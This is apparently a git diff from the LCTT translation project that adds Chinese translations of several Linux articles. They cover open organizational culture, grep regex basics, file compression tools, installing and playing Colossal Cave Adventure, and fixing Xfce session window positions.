||||
[2]:https://www.cyberciti.biz/tips/linux-send-wake-on-lan-wol-magic-packets.html
|
||||
[3]://www.cyberciti.biz/faq/unix-ping-command-examples/ (See Linux/Unix ping command examples for more info)
|
||||
[4]:https://www.cyberciti.biz/faq/apple-os-x-wake-on-lancommand-line-utility/
|
@ -0,0 +1,43 @@
|
||||
手把手教你构建开放式文化
|
||||
======
|
||||
我们于 2015 年发表 `开放组织 (Open Organization)` 后,很多不同类型、不同规模的公司都对“开放式”文化究竟意味着什么感到好奇。甚至当我跟别的公司谈论我们产品和服务的优势时,也总是很快就从谈论技术转移到人和文化上去了。几乎所有对推动创新和保持行业竞争优势有兴趣的人都在思考这个问题。
|
||||
|
||||
不是只有高级领导团队 (Senior leadership teams) 才对开放式工作感兴趣。[红帽公司最近一次调查 ][1] 发现 [81% 的受访者 ][2] 同意这样一种说法:"拥有开放式的组织文化对我们公司非常重要。"
|
||||
|
||||
然而要注意的是。同时只有 [67% 的受访者 ][3] 认为:"我们的组织有足够的资源来构建开放式文化。"
|
||||
|
||||
这个结果与我从其他公司那交流所听到的相吻合:人们希望在开放式文化中工作,他们只是不知道该怎么做。对此我表示同情,因为组织的行事风格是很难捕捉,评估,和理解的。在 [Catalyst-In-Chief][4] 中,我将其称之为 "组织中最神秘莫测的部分。"
|
||||
|
||||
开放式组织之所以让人神往是因为在这个数字化转型有望改变传统工作方式的时代,拥抱开放文化是保持持续创新的最可靠的途径。当我们在书写本文的时候,我们所关注的是描述在红帽公司中兴起的那种文化--而不是编写一本如何操作的书。我们并不会制定出一步步的流程来让其他组织采用。
|
||||
|
||||
这也是为什么与其他领导者和高管谈论他们是如何开始构建开放式文化的会那么有趣。在创建开放式组织时,很多高管会说我们要“改变我们的文化”。但是文化并不是一项输入。它是一项输出--它是人们互动和日常行为的副产品。
|
||||
|
||||
告诉组织成员"更加透明地工作","更多地合作",以及 "更加包容地行动" 并没有什么作用。因为像 "透明," "合作," and "包容" 这一类的文化特质并不是行动。他们只是组织内指导行为的价值观而已。
|
||||
|
||||
那么要如何才能构建开放式文化呢?
|
||||
|
||||
在过去的两年里,Opensource.com 收集了各种以开放的精神来进行工作,管理和领导的最佳实践方法。现在我们在新书 [The Open Organization Workbook][5] 中将之分享出来,这是一本更加规范的引发文化变革的指引。
|
||||
|
||||
要记住,任何改变,尤其是巨大的改变,都需要许诺 (commitment),耐心,以及努力的工作。我推荐你在通往伟大成功的大道上先使用这本工作手册来实现一些微小的,有意义的成果。
|
||||
|
||||
通过阅读这本书,你将能够构建一个开放而又富有创新的文化氛围,使你们的人能够茁壮成长。我已经迫不及待想听听你的故事了。
|
||||
|
||||
本文摘自 [Open Organization Workbook project][6]。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://opensource.com/open-organization/17/12/whitehurst-workbook-introduction
|
||||
|
||||
作者:[Jim Whitehurst][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://opensource.com/users/jwhitehurst
|
||||
[1]:https://www.redhat.com/en/blog/red-hat-releases-2017-open-source-culture-survey-results
|
||||
[2]:https://www.techvalidate.com/tvid/923-06D-74C
|
||||
[3]:https://www.techvalidate.com/tvid/D30-09E-B52
|
||||
[4]:https://opensource.com/open-organization/resources/catalyst-in-chief
|
||||
[5]:https://opensource.com/open-organization/resources/workbook
|
||||
[6]:https://opensource.com/open-organization/17/8/workbook-project-announcement
|
@ -0,0 +1,151 @@
|
||||
Bash 脚本:学习使用正则表达式(基础)
|
||||
======
|
||||
正则表达式(简写为 regex 或者 regexp)基本上是定义一种搜索模式的字符串,可以被用来执行“搜索”或者“搜索并替换”操作,也可以被用来验证像密码策略等条件。
|
||||
|
||||
正则表达式是一个我们可利用的非常强大的工具,并且使用正则表达式最好的事情是它能在几乎所有计算机语言中被使用。所以如果你使用 Bash 脚本或者创建一个 python 程序时,我们可以使用正则表达式或者也可以写一个单行搜索查询。
|
||||
|
||||
在这篇教程中,我们将会学习一些正则表达式的基本概念,并且学习如何在 Bash 中使用‘grep’时使用它们,但是如果你希望在其他语言如 python 或者 C 中使用它们,你只能使用正则表达式部分。那么让我们通过正则表达式的一个例子开始吧,
|
||||
|
||||
**Ex-** 一个正则表达式看起来像
|
||||
|
||||
**/t[aeiou]l/**
|
||||
|
||||
但这是什么意思呢?它意味着所提到的正则表达式将寻找一个词,它以‘t’开始,在中间包含字母‘a e i o u’中任意一个,并且字母‘l’作为最后一个字符。它可以是‘tel’,‘tal’或者‘til’,匹配可以是一个单独的词或者其它单词像‘tilt’,‘brutal’或者‘telephone’的一部分。
|
||||
|
||||
**grep 使用正则表达式的语法是**
|
||||
|
||||
**$ grep "regex_search_term" file_location**
|
||||
|
||||
如果头脑中没有想法,不要担心,这只是一个例子,来展示可以利用正则表达式获取什么,并且相信我这是最简单的例子。我们可以从正则表达式中获取更多。现在我们将从正则表达式基础的开始。
|
||||
|
||||
**(推荐阅读: [你应该知道的有用的 linux 命令][1])**
|
||||
|
||||
## **基础的正则表达式**
|
||||
|
||||
现在我们开始学习一些被称为元字符(MetaCharacters)的特殊字符。他们帮助我们创建更复杂的正则表达式搜索项。下面提到的是基本元字符的列表,
|
||||
|
||||
**. or Dot** 将匹配任意字符
|
||||
|
||||
**[ ]** 将匹配范围内字符
|
||||
|
||||
**[^ ]** 将匹配除了括号中提到的那个之外的所有字符
|
||||
|
||||
***** 将匹配零个或多个前面的项
|
||||
|
||||
**+** 将匹配一个或多个前面的项
|
||||
|
||||
**? ** 将匹配零个或一个前面的项
|
||||
|
||||
**{n}** 将匹配‘n’次前面的项
|
||||
|
||||
**{n,}** 将匹配‘n’次或更多前面的项
|
||||
|
||||
**{n,m}** 将匹配在‘n’和‘m’次之间的项
|
||||
|
||||
**{ ,m}** 将匹配少于或等于‘m’次的项
|
||||
|
||||
**\ ** 是一个转义字符,当我们需要在我们的搜索中包含一个元字符时使用
|
||||
|
||||
现在我们将用例子讨论所有这些元字符。
|
||||
|
||||
### **. or Dot**
|
||||
|
||||
它用于匹配出现在我们搜索项中的任意字符。举个例子,我们可以使用点如
|
||||
|
||||
**$ grep "d.g" file1**
|
||||
|
||||
这个正则表达式意味着我们在‘file_name’文件中正查找的词以‘d’开始,以‘g’结尾,中间可以有任意字符。同样,我们可以使用任意数量的点作为我们的搜索模式,如
|
||||
|
||||
**T......h**
|
||||
|
||||
这个查询项将查找一个词,以‘T’开始,以‘h’结尾,并且中间可以有任意 6 个字符。
|
||||
|
||||
### **[ ]**
|
||||
|
||||
方括号用于定义字符的范围。 例如,我们需要搜索一些特别的单词而不是匹配任何字符,
|
||||
|
||||
**$ grep "N[oen]n" file2**
|
||||
|
||||
这里,我们正寻找一个单词,以‘N’开头,以‘n’结尾,并且中间只能有‘o’,‘e’或者‘n’中的一个。 在方括号中我们可以提到单个到任意数量的字符。
|
||||
|
||||
我们在方括号中也可以定义像‘a-e’或者‘1-18’作为匹配字符的列表。
|
||||
|
||||
### **[^ ]**
|
||||
|
||||
这就像正则表达式的 not 操作。当使用 [^ ] 时,它意味着我们的搜索将包括除了方括号内提到的所有字符。例如,
|
||||
|
||||
**$ grep "St[^1-9]d" file3**
|
||||
|
||||
这意味着我们可以拥有所有这样的单词,它们以‘St’开始,以字母‘d’结尾,并且不得包含从1到9的任何数字。
|
||||
|
||||
到现在为止,我们只使用了仅需要在中间查找单个字符的正则表达式的例子,但是如果我们需要看的更多该怎么办呢。假设我们需要找到以一个字符开头和结尾的所有单词,并且在中间可以有任意数量的字符。这就是我们使用乘数(multiplier)元字符如 + * & ? 的地方。
|
||||
|
||||
{n}、{n,m}、{n,} 或者 {,m} 也是可以在我们的正则表达式项中使用的其他乘数元字符。
|
||||
|
||||
### * (星号)
|
||||
|
||||
以下示例匹配字母k的任意出现次数,包括一次没有:
|
||||
|
||||
**$ grep "lak*" file4**
|
||||
|
||||
它意味着我们可以匹配到‘lake’,‘la’或者‘lakkkk’
|
||||
|
||||
### +
|
||||
|
||||
以下模式要求字符串中的字母k至少被匹配到一次:
|
||||
|
||||
**$ grep "lak+" file5**
|
||||
|
||||
这里,k 在我们的搜索中至少需要出现一次,所以我们的结果可以为‘lake’或者‘lakkkk’,但不能是‘la’。
|
||||
|
||||
### **?**
|
||||
|
||||
在以下模式匹配中
|
||||
|
||||
**$ grep "ba?b" file6**
|
||||
|
||||
字符串 bb 或 bab,使用‘?’乘数,我们可以有一个或零个字符的出现。
|
||||
|
||||
### **非常重要的提示:**
|
||||
|
||||
当使用乘数时这是非常重要的,假设我们有一个正则表达式
|
||||
|
||||
**$ grep "S.*l" file7**
|
||||
|
||||
我们得到的结果是‘small’,‘silly’,并且我们也得到了‘Shane is a little to play ball’。但是为什么我们得到了‘Shane is a little to play ball’,我们只是在搜索中寻找单词,为什么我们得到了整个句子作为我们的输出。
|
||||
|
||||
这是因为它满足我们的搜索标准,它以字母‘s’开头,中间有任意数量的字符并以字母‘l’结尾。那么,我们可以做些什么来纠正我们的正则表达式来只是得到单词而不是整个句子作为我们的输出。
|
||||
|
||||
我们在正则表达式中需要增加 ? 元字符,
|
||||
|
||||
**$ grep "S.*?l" file7**
|
||||
|
||||
这将会纠正我们正则表达式的行为。
|
||||
|
||||
### **\ or Escape characters**
|
||||
|
||||
\ 是当我们需要包含一个元字符或者对正则表达式有特殊含义的字符的时候来使用。例如,我们需要找到所有以点结尾的单词,所以我们可以使用
|
||||
|
||||
**$ grep "S.*\\." file8**
|
||||
|
||||
这将会查找和匹配所有以一个点字符结尾的词。
|
||||
|
||||
通过这篇基本正则表达式教程,我们现在有一些关于正则表达式如何工作的基本概念。在我们的下一篇教程中,我们将学习一些高级的正则表达式的概念。同时尽可能多地练习,创建正则表达式并试着尽可能多地在你的工作中加入它们。如果有任何疑问或问题,您可以在下面的评论区留言。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: http://linuxtechlab.com/bash-scripting-learn-use-regex-basics/
|
||||
|
||||
作者:[SHUSAIN][a]
|
||||
译者:[kimii](https://github.com/kimii)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:http://linuxtechlab.com/author/shsuain/
|
||||
[1]:http://linuxtechlab.com/useful-linux-commands-you-should-know/
|
||||
|
||||
|
||||
|
||||
|
||||
|
@ -0,0 +1,115 @@
|
||||
如何优雅的使用大部分的 Linux 文件压缩
|
||||
=======
|
||||
如果你对 linux 系统下的对文件压缩命令或操作的有效性有任何疑问 ,你应该看一下 **apropos compress** 这个命令的输出 ;如果你有机会这么做 ,你会惊异于有如此多的的命令来进行压缩文件和解压缩文件 ;还有许多命令来进行压缩文件的比较 ,检验 ,并且能够在压缩文件中的内容中进行搜索 ,甚至能够把压缩文件从一个格式变成另外一种格式 ( *.z 格式变为 *.gz 格式 ) 。
|
||||
你想在所有词目中寻找一组 bzip2 的压缩命令 。包括 zip ,gzip ,和 xz 在内 ,你将得到一个有意思的操作。
|
||||
|
||||
```
|
||||
$ apropos compress | grep ^bz
|
||||
bzcat (1) - decompresses files to stdout
|
||||
bzcmp (1) - compare bzip2 compressed files
|
||||
bzdiff (1) - compare bzip2 compressed files
|
||||
bzegrep (1) - search possibly bzip2 compressed files for a regular expression
|
||||
bzexe (1) - compress executable files in place
|
||||
bzfgrep (1) - search possibly bzip2 compressed files for a regular expression
|
||||
bzgrep (1) - search possibly bzip2 compressed files for a regular expression
|
||||
bzip2 (1) - a block-sorting file compressor, v1.0.6
|
||||
bzless (1) - file perusal filter for crt viewing of bzip2 compressed text
|
||||
bzmore (1) - file perusal filter for crt viewing of bzip2 compressed text
|
||||
```
|
||||
|
||||
在我的Ubuntu系统上 ,列出了超过 60 条命令作为 apropos compress 命令的返回 。
|
||||
|
||||
## 压缩算法
|
||||
压缩并没有普适的方案 ,某些压缩工具是有损耗的压缩 ,例如能够使 mp3 文件减小大小而能够是听者有接近聆听原声的音乐感受 。但是 Linux 命令行能够用算法使压缩文件或档案文件能够重新恢复为原始数据 ,换句话说 ,算法能够使压缩或存档无损 。
|
||||
|
||||
这是如何做到的 ?300 个相同的在一行的相同的字符能够被压缩成像 “300x” 。但是这种算法不会对大多数的文件产生有效的益处 。因为文件中完全随机的序列要比相同字符的序列要多的多 。 压缩算法会越来越复杂和多样 ,所以在 Unix 早期 ,压缩是第一个被介绍的 。
|
||||
|
||||
## 在 Linux 系统上的压缩命令
|
||||
在 Linux 系统上最常用的压缩命令是 zip ,gzip ,bzip2 ,xz 。 前面提到的常用压缩命令以同样的方式工作 。会权衡文件内容压缩程度 ,压缩花费的时间 ,压缩文件在其他你需要使用的系统上的兼容性 。
|
||||
一些时候压缩一个文件并不会花费很多时间和性能 。在下面的例子中 ,被压缩的文件会比原始文件要大 。当在一个不是很普遍的情况下 ,尤其是在文件内容达到一定等级的随机度 。
|
||||
|
||||
```
|
||||
$ time zip bigfile.zip bigfile
|
||||
adding: bigfile (default 0% )
|
||||
real 0m0.055s
|
||||
user 0m0.000s
|
||||
sys 0m0.016s
|
||||
$ ls -l bigfile*
|
||||
-rw-r--r-- 1 root root 0 12月 20 22:36 bigfile
|
||||
-rw------- 1 root root 164 12月 20 22:41 bigfile.zip
|
||||
```
|
||||
注意压缩后的文件 ( bigfile.zip ) 比源文件 ( bigfile ) 要大 。如果压缩增加了文件的大小或者减少的很少的百分比 ,那就只剩下在线备份的好处了 。如果你在压缩文件后看到了下面的信息 。你不会得到太多的益处 。
|
||||
( deflated 1% )
|
||||
|
||||
文件内容在文件压缩的过程中有很重要的作用 。在上面文件大小增加的例子中是因为文件内容过于随机 。压缩一个文件内容只包含 0 的文件 。你会有一个相当震惊的压缩比 。在如此极端的情况下 ,三个常用的压缩工具都有非常棒的效果 。
|
||||
|
||||
```
|
||||
-rw-rw-r-- 1 shs shs 10485760 Dec 8 12:31 zeroes.txt
|
||||
-rw-rw-r-- 1 shs shs 49 Dec 8 17:28 zeroes.txt.bz2
|
||||
-rw-rw-r-- 1 shs shs 10219 Dec 8 17:28 zeroes.txt.gz
|
||||
-rw-rw-r-- 1 shs shs 1660 Dec 8 12:31 zeroes.txt.xz
|
||||
-rw-rw-r-- 1 shs shs 10360 Dec 8 12:24 zeroes.zip
|
||||
```
|
||||
你不会喜欢为了查看文件中的 50 个字节而将上千万字节的数据完全解压 。这样做是极不划算的 。
|
||||
在更真实的情况下 ,大小差异是总体上的不同 -- 不是重大的效果 -- 对于一个小的公正的 jpg 的图片文件 。
|
||||
|
||||
```
|
||||
-rw-r--r-- 1 shs shs 13522 Dec 11 18:58 image.jpg
|
||||
-rw-r--r-- 1 shs shs 13875 Dec 11 18:58 image.jpg.bz2
|
||||
-rw-r--r-- 1 shs shs 13441 Dec 11 18:58 image.jpg.gz
|
||||
-rw-r--r-- 1 shs shs 13508 Dec 11 18:58 image.jpg.xz
|
||||
-rw-r--r-- 1 shs shs 13581 Dec 11 18:58 image.jpg.zip
|
||||
```
|
||||
|
||||
在压缩文本文件时 ,你会发现明显的差异 。
|
||||
```
|
||||
$ ls -l textfile*
|
||||
-rw-rw-r-- 1 shs shs 8740836 Dec 11 18:41 textfile
|
||||
-rw-rw-r-- 1 shs shs 1519807 Dec 11 18:41 textfile.bz2
|
||||
-rw-rw-r-- 1 shs shs 1977669 Dec 11 18:41 textfile.gz
|
||||
-rw-rw-r-- 1 shs shs 1024700 Dec 11 18:41 textfile.xz
|
||||
-rw-rw-r-- 1 shs shs 1977808 Dec 11 18:41 textfile.zip
|
||||
```
|
||||
|
||||
在这种情况下 ,XZ 相较于其他压缩文件有效的减小了文件的大小 ,对于第二的 bzip2 命令也有很大的提高
|
||||
|
||||
## 查看压缩文件
|
||||
|
||||
以 more 结尾的命令能够让你查看压缩文件而不解压文件 。
|
||||
|
||||
```
|
||||
bzmore (1) - file perusal filter for crt viewing of bzip2 compressed text
|
||||
lzmore (1) - view xz or lzma compressed (text) files
|
||||
xzmore (1) - view xz or lzma compressed (text) files
|
||||
zmore (1) - file perusal filter for crt viewing of compressed text
|
||||
```
|
||||
这些命令在大多数工作中被使用 ,自从不得不使文件解压缩而只为了显示给用户 。在另一方面 ,留下被解压的文件在系统中 。这些命令简单的使文件解压缩 。
|
||||
|
||||
```
|
||||
$ xzmore textfile.xz | head -1
|
||||
Here is the agenda for tomorrow's staff meeting:
|
||||
```
|
||||
|
||||
## 比较压缩文件
|
||||
许多的压缩工具箱包含一个差异命令 ( 例如 :xzdiff ) 。这些工具通过这些工作来进行比较和差异而不是做算法指定的比较 。例如 ,xzdiff 命令比较 bz2 类型的文件和比较 xz 类型的文件一样简单 。
|
||||
|
||||
## 如何选择最好的 Linux 压缩工具
|
||||
如何选择压缩工具取决于你工作 。在一些情况下 ,选择取决于你所压缩的数据内容 。在更多的情况下 ,取决你你组织的惯例 ,除非你对磁盘空间有着很高的敏感度 。下面是一般的建议 :
|
||||
zip :文件需要被分享或者会在 Windows 系统下使用 。
|
||||
gzip :文件在 Unix/Linux 系统下使用 。长远来看 ,bzip2 是普遍存在的 。
|
||||
bzip2 :使用了不同的算法 ,产生比 gzip 更小的文件 ,但是花更长的时间 。
|
||||
xz :一般提供最好的压缩率 ,但是也会花费相当的时间 。比其他工具更新 ,可能在你工作的系统上不存在 。
|
||||
|
||||
## 注意
|
||||
当你在压缩文件时,你有很多选择 ,在极少的情况下 ,会产生无效的磁盘存储空间。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
via: https://www.networkworld.com/article/3240938/linux/how-to-squeeze-the-most-out-of-linux-file-compression.html
|
||||
|
||||
作者 :[ Sandra Henry-Stocker ][1] 译者:[ singledp ][2] 校对:校对者ID
|
||||
|
||||
本文由 [ LCTT ][3]原创编译,Linux中国 荣誉推出
|
||||
|
||||
[1]:https://www.networkworld.com
|
||||
[2]:https://github.com/singledo
|
||||
[3]:https://github.com/LCTT/TranslateProject
|
@ -0,0 +1,115 @@
|
||||
最有名的经典文字冒险游戏
|
||||
======
|
||||
**<ruby>巨洞冒险<rt>Colossal Cave Adventure</rt></ruby>**,又名 **ADVENT**、**Colossal Cave** 或 **Adventure**,是八十年代初到九十年代末最受欢迎的基于文字的冒险游戏。这款游戏还作为史上第一款“<ruby>互动小说<rt>interactive fiction</rt></ruby>”类游戏而闻名。在 1976 年,一个叫 **Will Crowther** 的程序员开发了这款游戏的一个早期版本,之后另一位叫 **Don Woods** 的程序员改进了这款游戏,为它添加了许多新元素,包括计分系统以及更多的幻想角色和场景。这款游戏最初是为 **PDP-10** 开发的,这是一个历史悠久的大型计算机。后来,它被移植到普通家用台式电脑上,比如 IBM PC 和 Commodore 64。游戏的最初版使用 Fortran 开发,之后在八十年代初它被微软加入到 MS-DOS 1.0 当中。
|
||||
|
||||
![](https://www.ostechnix.com/wp-content/uploads/2017/12/Colossal-Cave-Adventure-1.jpeg)
|
||||
|
||||
1995 年发布的最终版本 **Adventure 2.5** 从来没有可用于现代操作系统的安装包。它已经几乎绝版。万幸的是,在多年之后身为开源运动提倡者的 **Eric Steven Raymond** 得到了原作者们的同意之后将这款经典游戏移植到了现代操作系统上。他把这款游戏开源并将源代码以 **”open-adventure“** 之名托管在 GitLab 上。
|
||||
|
||||
你在这款游戏的主要目标是找到一个传言中藏有大量宝藏和金子的洞穴并活着离开它。玩家在这个虚拟洞穴中探索时可以获得分数。一共可获得的分数是 430 点。这款游戏的灵感主要来源于原作者 **Will Crowther** 丰富的洞穴探索的经历。他曾经积极地在洞穴中冒险,特别是肯塔基州的<ruby>猛犸洞<rt>Mammoth Cave</rt></ruby>。因为游戏中的洞穴结构大体基于猛犸洞,你也许会注意到游戏中的场景和现实中的猛犸洞的相似之处。
|
||||
|
||||
### 安装巨洞冒险
|
||||
|
||||
Open Adventure 在 [**AUR**][1] 上有面对 Arch 系列操作系统的安装包。所以我们可以在 Arch Linux 或者像 Antergos 和 Manjaro Linux 等基于 Arch 的发行版上使用任何 AUR 辅助程序安装这款游戏。
|
||||
|
||||
使用 [**Pacaur**][2]:
|
||||
```
|
||||
pacaur -S open-adventure
|
||||
```
|
||||
|
||||
使用 [**Packer**][3]:
|
||||
```
|
||||
packer -S open-adventure
|
||||
```
|
||||
|
||||
使用 [**Yaourt**][4]:
|
||||
```
|
||||
yaourt -S open-adventure
|
||||
```
|
||||
|
||||
在其他 Linux 发行版上,你也许需要经过如下步骤来从源代码编译并安装这款游戏。
|
||||
|
||||
首先安装依赖项:
|
||||
|
||||
在 Debian 和 Ubuntu 上:
|
||||
```
|
||||
sudo apt-get install python3-yaml libedit-dev
|
||||
```
|
||||
|
||||
在 Fedora 上:
|
||||
```
|
||||
sudo dnf install python3-PyYAML libedit-devel
|
||||
```
|
||||
|
||||
你也可以使用 pip 来安装 PyYAML:
|
||||
```
|
||||
sudo pip3 install PyYAML
|
||||
```
|
||||
|
||||
安装好依赖项之后,用以下命令从源代码编译并安装 open-adventure:
|
||||
```
|
||||
git clone https://gitlab.com/esr/open-adventure.git
|
||||
```
|
||||
```
|
||||
make
|
||||
```
|
||||
```
|
||||
make check
|
||||
```
|
||||
|
||||
最后,运行 ‘advent’ 程序开始游戏:
|
||||
```
|
||||
advent
|
||||
```
|
||||
|
||||
在 [**Google Play store**][5] 上还有这款游戏的安卓版。
|
||||
|
||||
### 游戏说明
|
||||
|
||||
要开始游戏,只需在终端中输入这个命令:
|
||||
```
|
||||
advent
|
||||
```
|
||||
|
||||
你会看到一个欢迎界面。按 “y” 来查看教程,或者按 “n“ 来开始冒险之旅。
|
||||
|
||||
![][6]
|
||||
|
||||
游戏在一个小砖房前面开始。玩家需要使用由一到两个简单的英语单词单词组成的命令来控制角色。要移动角色,只需输入 **in**、 **out**、**enter**、**exit**、**building**、**forest**、**east**、**west**、**north**、**south**、**up** 或 **down** 等指令。
|
||||
|
||||
比如说,如果你输入 **”south“** 或者简写 **”s“**,游戏角色就会向当前位置的南方移动。注意每个单词只有前五个字母有效,所以当你需要输入更长的单词时需要使用缩写,比如要输入 **northeast** 时,只需输入 NE(大小写均可)。要输入 **southeast** 则使用 SE。要捡起物品,输入 **pick**。要进入一个建筑物或者其他的场景,输入 **in**。要从任何场景离开,输入 **exit**,诸如此类。当你遇到危险时你会受到警告。你也可以使用两个单词的短语作为命令,比如 **”eat food“**、**”drink water“**、**”get lamp“**、**”light lamp“**、**”kill snake“** 等等。你可以在任何时候输入 **”help“** 来显示游戏帮助。
|
||||
|
||||
![][8]
|
||||
|
||||
我花了一整个下午来探索这款游戏。天哪,这真是段超级有趣、激动人心又紧张刺激的冒险体验!
|
||||
|
||||
![][9]
|
||||
|
||||
我打通了许多关卡并在路上探索了各式各样的场景。我甚至找到了金子,还被一条蛇和一个矮人袭击过。我必须承认这款游戏真是非常让人上瘾,简直是最好的时间杀手。
|
||||
|
||||
如果你安全地带着财宝离开了洞穴,你会取得游戏胜利,并获得财宝全部的所有权。你在找到财宝的时候也会获得部分的奖励。要提前离开你的冒险,输入 **”quit“**。要暂停冒险,输入 **”suspend“**(或者 ”pause“ 或 ”save“)。你可以在之后继续冒险。要看你现在的进展如何,输入 **”score“**。记住,被杀或者退出会导致丢分。
|
||||
|
||||
祝你们玩得开心!再见!
|
||||
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.ostechnix.com/colossal-cave-adventure-famous-classic-text-based-adventure-game/
|
||||
|
||||
作者:[SK][a]
|
||||
译者:[yixunx](https://github.com/yixunx)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.ostechnix.com/author/sk/
|
||||
[1]:https://aur.archlinux.org/packages/open-adventure/
|
||||
[2]:https://www.ostechnix.com/install-pacaur-arch-linux/
|
||||
[3]:https://www.ostechnix.com/install-packer-arch-linux-2/
|
||||
[4]:https://www.ostechnix.com/install-yaourt-arch-linux/
|
||||
[5]:https://play.google.com/store/apps/details?id=com.ecsoftwareconsulting.adventure430
|
||||
[6]:https://www.ostechnix.com/wp-content/uploads/2017/12/Colossal-Cave-Adventure-2.png
|
||||
[7]:http://www.ostechnix.com/wp-content/uploads/2017/12/Colossal-Cave-Adventure-2.png
|
||||
[8]:http://www.ostechnix.com/wp-content/uploads/2017/12/Colossal-Cave-Adventure-3.png
|
||||
[9]:http://www.ostechnix.com/wp-content/uploads/2017/12/Colossal-Cave-Adventure-1.png
|
@ -0,0 +1,68 @@
|
||||
在 Xfce 会话中保存窗口的位置
|
||||
======
|
||||
摘要:如果你发现 Xfce session 不能保存窗口的位置,那么启用 `save on logout` 然后登出再登录一次,可能就能修复这个问题了(如果你希望保持同一个 session,之后可以再把该选项关掉,修复效果依然是永久的)。 下面是详细内容。
|
||||
|
||||
我用 Xfce 作桌面有些年头了,但是每次重启后进入之前保存的 session 时总会有问题出现。 登录后, 之前 session 中保存的应用都会启动, 但是所有的工作区和窗口位置数据会丢失, 导致所有应用都堆在默认工作区中,乱糟糟的。
|
||||
|
||||
多年来,很多人都报道过这个问题( Ubuntu, Xfce, 以及 Red Hat 的 bug 追踪系统中都有登记这个 bug)。 虽然 Xfce4.10 中已经修复过了一个相关 bug, 但是我用的 Xfce4.12 依然有这个问题。 如果不是我的其中一个系统能够正常地恢复各个窗口的位置,我几乎都要放弃找出问题的原因了(事实上我之前已经放弃过很多次了)。
|
||||
|
||||
今天,我深入对比了两个系统的不同点,最终解决了这个问题。 我现在就把结果写出来, 以防有人也遇到相同的问题。
|
||||
|
||||
提前的一些说明:
|
||||
|
||||
1。由于这个笔记本只有我在用,因此我几乎不登出我的 Xfce session。 我一般只是休眠然后唤醒,除非由于要对内核打补丁才进行重启, 或者由于某些改动损毁了休眠镜像导致系统从休眠中唤醒时卡住了而不得不重启。 另外,我也很少使用 Xfce 工具栏上的重启按钮重启; 一般我只是运行一下 `reboot`。
|
||||
|
||||
2。我会使用 xterm 和 Emacs, 这些 X 应用写的不是很好,无法记住他们自己的窗口位置。
|
||||
|
||||
Xfce 将 sessions 信息保存到主用户目录中的 `.cache/sessions` 目录中。在经过仔细检查后发现,在正常的系统中有两类文件存储在该目录中,而在非正常的系统中,只有一类文件存在该目录下。
|
||||
|
||||
其中一类文件的名字类似 `xfce4-session-hostname:0` 这样的,其中包含的内容类似下面这样的:
|
||||
```
|
||||
Client9_ClientId=2a654109b-e4d0-40e4-a910-e58717faa80b
|
||||
Client9_Hostname=local/hostname
|
||||
Client9_CloneCommand=xterm
|
||||
Client9_RestartCommand=xterm,-xtsessionID,2a654109b-e4d0-40e4-a910-e58717faa80b
|
||||
Client9_Program=xterm
|
||||
Client9_UserId=user
|
||||
|
||||
```
|
||||
|
||||
这个文件记录了所有正在运行的程序。如果你进入 Settings -> Session and Startup 并清除 session 缓存, 就会删掉这种文件。 当你保存当前 session 时, 又会创建这种文件。 这就是 Xfce 知道要启动哪些应用的原因。 但是请注意,上面并没有包含任何窗口位置的信息。 (我还曾经以为可以根据 session ID 来找到其他地方的一些相关信息,但是失败了)。
|
||||
|
||||
正常工作的系统在目录中还有另一类文件,名字类似 `xfwm4-2d4c9d4cb-5f6b-41b4-b9d7-5cf7ac3d7e49.state` 这样的。 其中文件内容类似下面这样:
|
||||
```
|
||||
[CLIENT] 0x200000f
|
||||
[CLIENT_ID] 2a9e5b8ed-1851-4c11-82cf-e51710dcf733
|
||||
[CLIENT_LEADER] 0x200000f
|
||||
[RES_NAME] xterm
|
||||
[RES_CLASS] XTerm
|
||||
[WM_NAME] xterm
|
||||
[WM_COMMAND] (1) "xterm"
|
||||
[GEOMETRY] (860,35,817,1042)
|
||||
[GEOMETRY-MAXIMIZED] (860,35,817,1042)
|
||||
[SCREEN] 0
|
||||
[DESK] 2
|
||||
[FLAGS] 0x0
|
||||
|
||||
```
|
||||
|
||||
注意这里的 geometry 和 desk 记录的正是我们想要的窗口位置以及工作区号。因此不能保存窗口位置的原因就是因为缺少这个文件。
|
||||
|
||||
继续深入下去,我发现当你明确地手工保存 session 时,只会保存第一个文件而不会保存第二个文件。 但是当登出保存 session 时则会保存第二个文件。 因此, 我进入 Settings -> Session and Startup 中,在 General 标签页中启用登出时自动保存 session, 然后登出后再进来, 然后 tada, 第二个文件出现了。 再然后我又关闭了登出时自动保存 session。( 因为我一般在排好屏幕后就保存一个 session, 但是我不希望做出的改变也会影响到这个保存的 session, 如有必要我会明确地手工进行保存), 现在我的窗口位置能够正常地恢复了。
|
||||
|
||||
这也解释了为什么有的人会有问题而有的人没有问题: 有的人可能一直都是用登出按钮重启,而有些人则是手工重启(或者仅仅是由于系统漰溃了才重启)。
|
||||
|
||||
顺带一提,这类问题, 以及为解决问题而付出的努力正是我赞同为软件存储的状态文件编写 man 页或其他类似文档的原因。 为用户编写文档,不仅能帮助别人深入挖掘产生奇怪问题的原因, 也能让软件作者注意到软件中那些奇怪的东西, 比如将 session 状态存储到两个独立的文件中去。
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.eyrie.org/~eagle/journal/2017-12/001.html
|
||||
|
||||
作者:[Russ Allbery][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.eyrie.org
|
